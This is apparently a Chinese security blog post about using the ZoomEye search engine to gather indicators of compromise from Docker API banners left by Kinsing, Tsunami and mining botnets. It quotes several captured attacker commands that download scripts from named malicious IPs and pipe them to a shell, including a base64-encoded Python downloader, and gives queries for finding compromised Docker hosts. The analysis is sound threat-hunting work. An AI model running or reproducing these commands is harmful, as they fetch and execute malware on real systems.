ZoomEye中怎么獲取IOC
發(fā)布時(shí)間:2021-08-23 15:12
來(lái)源:億速云
閱讀:0
作者:Leah
欄目: 網(wǎng)絡(luò )安全
這篇文章給大家介紹ZoomEye中怎么獲取IOC���,內容非常詳細�����,感興趣的小伙伴們可以參考借鑒���,希望對大家能有所幫助�。
最近日常使用ZoomEye搜索一些惡意IOC IP信息時(shí)����,發(fā)現一個(gè)現在還在活躍的惡意IP:194.38.20.199 直接在ZoomEye里查詢(xún):194.38.20.199 -ip:194.38.20.199解釋下:前面那IP當字符串全局匹配�,后面的-ip:194.38.20.199的目的是排除掉本身這個(gè)IP開(kāi)的端口服務(wù)的一些信息�����,結果如下圖:得到129條結果�����,其中主要是及docker服務(wù):這些都是這個(gè)團伙作案遺留下來(lái)的痕跡被ZoomEye捕獲�����,從redis記錄可以看出來(lái)是通過(guò)設置 master_host 的方式進(jìn)行攻擊的(參考 https://paper.seebug.org/975/ )�����,而docker服務(wù)通過(guò)docker api獲取容器信息來(lái)看是設置了鏡像Command命令實(shí)現命令執行:
/bin/bash -c 'apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 194.38.20.199/d.sh | sh;tail -f /dev/null'"
訪(fǎng)問(wèn)確定目前這個(gè)IP幾服務(wù)還是存活狀態(tài)��!很多事情僵尸網(wǎng)絡(luò )等的自動(dòng)化攻擊都會(huì )遺留下很多的攻擊痕跡�,而這些痕跡可以被網(wǎng)絡(luò )空間搜索引擎探測捕捉到�,比如 https://paper.seebug.org/595/ 再比如 前不久360netlab抓到的一個(gè)新的Matryosh僵尸網(wǎng)絡(luò )通過(guò)攻擊adb服務(wù)進(jìn)行傳播���,國外的研究者就發(fā)現通過(guò)ZoomEye可以捕捉到有意思信息 https://twitter.com/r3dbU7z/status/1356802656493264896我們回到這個(gè)主題案例�,在這些被入侵的docker api服務(wù)里我們可以通過(guò)ZoomEye搜索 wget 或 curl 或 apt-get這些痕跡來(lái)確定被入侵目標及其他黑客團伙或IOC信息�����,我們以wget為例子 搜索語(yǔ)法如下:
"Server: Docker" +"Content-Type: application/json" +wget
到目前搜索到71 條結果(注意這個(gè)結果可能隨時(shí)變化這個(gè)是因為ZoomEye采用覆蓋更新的方式�,比如被入侵后恢復正常服務(wù)就會(huì )被替換)搜索其他團伙或者IOC語(yǔ)法如下:
"Server: Docker" +"Content-Type: application/json" +wget -194.38.20.199
排除包含有194.38.20.199的目標�,得到19條結果���。隨便找一個(gè):
"Command":"sh -c 'wget -qO - http://34.66.229.152:80/wp-content/themes/twentyseventeen/d | sh; tail -f /dev/null'"
找到一個(gè)新的34.66.229.152[目前也處于存活狀態(tài)] 開(kāi)源威脅情報顯示這個(gè)是Tsunami的DDOS團伙��,我們繼續語(yǔ)法:
"Server: Docker" +"Content-Type: application/json" +wget -194.38.20.199 -34.66.229.152
得到2條目標��,看下banner里的Command信息得到2個(gè)惡意IP 45.137.155.55[目前也處于存活狀態(tài)] 及 209.141.40.190[目前也處于存活狀態(tài)]
"Command":"/bin/bash -c 'apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 45.137.155.55/d.sh | sh;tail -f /dev/null'"
從這個(gè)命令格式及d.sh的來(lái)看跟 194.38.20.199的很類(lèi)似����,姑且可以歸于Kinsing����。
"Command":"chroot /mnt /bin/sh -c 'curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms'"
看起來(lái)又是一個(gè)挖礦相關(guān)的�����,所以到目前為止我們通過(guò)在Docker API信息里搜索wget最終找到了如下幾個(gè)惡意IOC:194.38.20.199/45.137.155.55 Kinsing/挖礦34.66.229.152 Tsunami/DDOS209.141.40.190 未知/挖礦當然你還可以通過(guò)分析哪些sh腳本提取跟多的IOC IP地址進(jìn)行關(guān)聯(lián)���,這里與主題關(guān)系不大就不繼續了����。
